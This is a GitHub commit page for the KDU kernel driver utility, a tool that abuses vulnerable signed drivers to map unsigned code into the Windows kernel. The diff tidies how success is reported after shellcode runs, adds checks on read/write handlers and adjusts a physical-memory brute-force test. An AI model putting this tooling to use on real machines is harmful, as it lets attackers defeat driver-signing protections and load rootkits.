Skip to content

Commit

Permalink
v 1.3.0
Browse files Browse the repository at this point in the history 
Internal rearrange
  • Loading branch information
@hfiref0x
hfiref0x committed Mar 24, 2023
1 parent 07ec6e6 commit 8c37768
Show file tree
Hide file tree
Showing 6 changed files with 102 additions and 48 deletions.
10 changes: 5 additions & 5 deletions KDU.sha256
View file
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,7 @@ f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaz
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
09970cfcb9bfb7a8964ae4ec48fd15c1805e93ea81c858de2793691eefda3881 *Source\Hamakaze\diag.cpp
a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaze\diag.h
4894e61226774096e0923164898f314e3ff203d34344df35b936b18f3663e3e7 *Source\Hamakaze\drvmap.cpp
7b15ce1e8654f24a9ac70fdae618fe6c96684bf8462e27d2835da617a51f3308 *Source\Hamakaze\drvmap.cpp
c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h
46a4fd4dacc53b917a0894542c786c5db08ac662157438447fa89f71afa615c5 *Source\Hamakaze\dsefix.cpp
5131aa81ffb17238a092b313a954a6d9e9203636ba47562f0a7f8d4daf306221 *Source\Hamakaze\dsefix.h
Expand All @@ -37,7 +37,7 @@ ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaz
a62576fdaf4fa1fa3782427c9662c7708af81a81b5703ce8d1a5d3bb4d680bde *Source\Hamakaze\KDU.vcxproj.filters
b3272c6ec95065c5d293cd256f6f395d1d7b6b8dcac6e49cb1d96806d563593e *Source\Hamakaze\KDU.vcxproj.user
a224b5276d3006e16d8bb6b5ef6c701842678612dbcfafb53a840eb174ecfca2 *Source\Hamakaze\kduplist.h
e4008c31f4e819a8920f932f763ecd01a6510715cf6b391354eea281321afe86 *Source\Hamakaze\kduprov.cpp
4622665b799f0b2a5c77f4dfafc250c4d882fc3105cf9306fc888f678cd8563b *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
ace87ca919d2502c47d147814808e42b892b38cf9092aa69a3dad5f44da05323 *Source\Hamakaze\main.cpp
e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
Expand All @@ -52,7 +52,7 @@ c617a2090e51738ba9aadff46c573fcf57caada21219ed673ee0f8998e35a831 *Source\Hamakaz
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
7f97a97deea91390c87c759869e069635be6a329ffc941d53da86cfa0ecf1522 *Source\Hamakaze\sup.cpp
a13d8320351de7e0366dc935271be1e53bd0e69fa02f3141de67cbf71e5f3155 *Source\Hamakaze\sup.h
31ca945f51fd2779e827d0c9cd9dfd58f33d532b0bee00d0aa044910ab71e05c *Source\Hamakaze\tests.cpp
69fc5422986ab04061534187cd268026be3eba3f38600a3a7b173ee6314b7549 *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
8046da85c2f9853496b369fa63fe1b89d47583d5367db4a49edfd9f52426e6d7 *Source\Hamakaze\victim.cpp
5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h
Expand All @@ -63,7 +63,7 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
76295f1463903ba5ed48ec7e04bb7c43ec4f0b76f112141aedcdbc6cc3355039 *Source\Hamakaze\idrv\alcpu.cpp
98a21df59cb881c1029a8a6c1ad30c9481075c2e4b1fb43969ee6607816b9c9f *Source\Hamakaze\idrv\alcpu.h
251fc648b3592c5e9b9e6085b5a58786ae0b2690b0cd85d9fc4f8a7c80689b84 *Source\Hamakaze\idrv\asrdrv.cpp
de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaze\idrv\asrdrv.cpp
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
Expand Down Expand Up @@ -102,7 +102,7 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
48cd4fcd61fb5649064726cb7cc42e9977240c11731cf32a4e971eb39ab51b3d *Source\Hamakaze\idrv\winio.cpp
d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h
57735ccbb0e84b63a6ffc950b2b392125940cee52012bfe0c762c56144e34e2b *Source\Hamakaze\idrv\winring0.cpp
21c357fab30206cb0942e2fbfef6716b2f315d3620827ee32db451a2ebbc3c7d *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
524cb55125d1998b60a259ce689164494810979ade21bf5d23e658feeef845f2 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
Expand Down
16 changes: 5 additions & 11 deletions Source/Hamakaze/drvmap.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -694,15 +694,13 @@ BOOL KDUpMapDriverPhysicalSection(
supPrintfEvent(kduEventError,
"[!] Shellcode did not trigger the event within two seconds.\r\n");

bSuccess = FALSE;
}
else
{
KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
}

bSuccess = TRUE;

} while (FALSE);

//
Expand Down Expand Up @@ -766,19 +764,18 @@ BOOL KDUpMapDriverPhysicalBruteForce(
supPrintfEvent(kduEventError,
"[!] Shellcode did not trigger the event within two seconds.\r\n");

bSuccess = FALSE;
}
else
{
KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
}

}
else {
supPrintfEvent(kduEventError,
"[!] Failed to enumerate physical memory.\r\n");

bSuccess = FALSE;
}

//
Expand Down Expand Up @@ -826,7 +823,6 @@ BOOL KDUpMapDriverDirectVM(
supPrintfEvent(kduEventError,
"[!] Error writing shellcode to the target driver, abort\r\n");

bSuccess = FALSE;
}
else {

Expand All @@ -846,11 +842,11 @@ BOOL KDUpMapDriverDirectVM(
supPrintfEvent(kduEventError,
"[!] Shellcode did not trigger the event within two seconds.\r\n");

bSuccess = FALSE;
}
else
{
KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
}
}

Expand Down Expand Up @@ -937,13 +933,11 @@ BOOL KDUMapDriver(

printf_s("[+] Query victim loaded driver layout\r\n");

bSuccess = VpQueryInformation(
if (VpQueryInformation(
Context->Victim,
VictimDriverInformation,
&vdi,
sizeof(vdi));

if (bSuccess)
sizeof(vdi)))
{

targetAddress = vdi.LoadedImageBase + dispatchOffset;
Expand Down
2 changes: 1 addition & 1 deletion Source/Hamakaze/idrv/asrdrv.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -133,7 +133,7 @@ BOOL AsrEncryptDriverRequest(
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);

if (bResult && cbResult) {
if (bResult && cbResult && pbCipherData) {

ULONG outSize = sizeof(ASRDRV_REQUEST) +
cbResult +
Expand Down
2 changes: 1 addition & 1 deletion Source/Hamakaze/idrv/winring0.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ BOOL WRZeroReadPhysicalMemory(
return supCallDriver(DeviceHandle,
IOCTL_OLS_READ_MEMORY,
&request,
sizeof(request),
sizeof(OLS_READ_MEMORY_INPUT),
Buffer,
NumberOfBytes);
}
Expand Down
81 changes: 65 additions & 16 deletions Source/Hamakaze/kduprov.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -679,6 +679,25 @@ HINSTANCE KDUProviderLoadDB(
return hInstance;
}

BOOL KDUpRwHandlersAreSet(
_In_ PVOID ReadHandler,
_In_ PVOID WriteHandler
)
{
if (ReadHandler == NULL ||
WriteHandler == NULL)
{

supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");

return FALSE;

}

return TRUE;
}

/*
* KDUProviderVerifyActionType
*
Expand All @@ -688,11 +707,11 @@ HINSTANCE KDUProviderLoadDB(
*
*/
BOOL KDUProviderVerifyActionType(
_In_ KDU_PROVIDER * Provider,
_In_ KDU_PROVIDER* Provider,
_In_ KDU_ACTION_TYPE ActionType)
{
BOOL bResult = TRUE;

#ifdef _DEBUG
return TRUE;
#endif
Expand All @@ -713,15 +732,33 @@ BOOL KDUProviderVerifyActionType(
return FALSE;
}

if (Provider->LoadData->PhysMemoryBruteForce &&
(Provider->Callbacks.ReadPhysicalMemory == NULL ||
Provider->Callbacks.WritePhysicalMemory == NULL))
{
supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support physical memory read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");

return FALSE;
if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce) {

//
// Driver must have at least something defined.
//
BOOL bFirstTry = TRUE, bSecondTry = TRUE;

if (Provider->Callbacks.ReadPhysicalMemory == NULL ||
Provider->Callbacks.WritePhysicalMemory == NULL)
{
bFirstTry = FALSE;
}

if (Provider->Callbacks.ReadKernelVM == NULL ||
Provider->Callbacks.WriteKernelVM == NULL)
{
bSecondTry = FALSE;
}

if (bFirstTry == NULL && bSecondTry == NULL) {
supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");
return FALSE;
}

}

break;

default:
Expand All @@ -735,16 +772,28 @@ BOOL KDUProviderVerifyActionType(
//
// Check if we can read/write.
//
if (Provider->Callbacks.ReadKernelVM == NULL ||
Provider->Callbacks.WriteKernelVM == NULL)
{

supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");
if (Provider->LoadData->PreferPhysical) {

bResult = FALSE;
if (!KDUpRwHandlersAreSet(
(PVOID)Provider->Callbacks.ReadPhysicalMemory,
(PVOID)Provider->Callbacks.WritePhysicalMemory))
{
bResult = FALSE;
}

}
else {

if (!KDUpRwHandlersAreSet(
(PVOID)Provider->Callbacks.ReadKernelVM,
(PVOID)Provider->Callbacks.WriteKernelVM))
{
bResult = FALSE;
}

}

break;

case ActionTypeMapDriver:
Expand Down
39 changes: 25 additions & 14 deletions Source/Hamakaze/tests.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -115,26 +115,37 @@ BOOL WINAPI TestPhysMemEnumCallback(
VOID TestBrute(PKDU_CONTEXT Context)
{
KDU_PHYSMEM_ENUM_PARAMS params;
VICTIM_IMAGE_INFORMATION vi;
HANDLE victimDeviceHandle = NULL;

params.DeviceHandle = Context->DeviceHandle;
params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
if (VpCreate(Context->Victim, Context->ModuleBase, &victimDeviceHandle, NULL, NULL)) {

params.DispatchSignature = Context->Victim->Data.DispatchSignature;
params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
RtlSecureZeroMemory(&vi, sizeof(vi));
VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi));

params.bWrite = FALSE;
params.cbPayload = 0;
params.pvPayload = NULL;
params.ccPagesFound = 0;
params.ccPagesModified = 0;
params.DeviceHandle = Context->DeviceHandle;
params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;

if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, &params)) {
params.DispatchSignature = Context->Victim->Data.DispatchSignature;
params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;

printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);
params.DispatchHandlerOffset = vi.DispatchOffset;
params.DispatchHandlerPageOffset = vi.DispatchPageOffset;
params.JmpAddress = vi.JumpValue;

params.bWrite = FALSE;
params.cbPayload = 0;
params.pvPayload = NULL;
params.ccPagesFound = 0;
params.ccPagesModified = 0;

if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, &params)) {

printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);

}
}

}

VOID KDUTest()
Expand All @@ -146,7 +157,7 @@ VOID KDUTest()

RtlSecureZeroMemory(&Buffer, sizeof(Buffer));

Context = KDUProviderCreate(KDU_PROVIDER_HR_PHYSMEM,
Context = KDUProviderCreate(KDU_PROVIDER_WINRING0,
FALSE,
NT_WIN7_SP1,
KDU_SHELLCODE_V1,
Expand Down

0 comments on commit 8c37768

Please sign in to comment.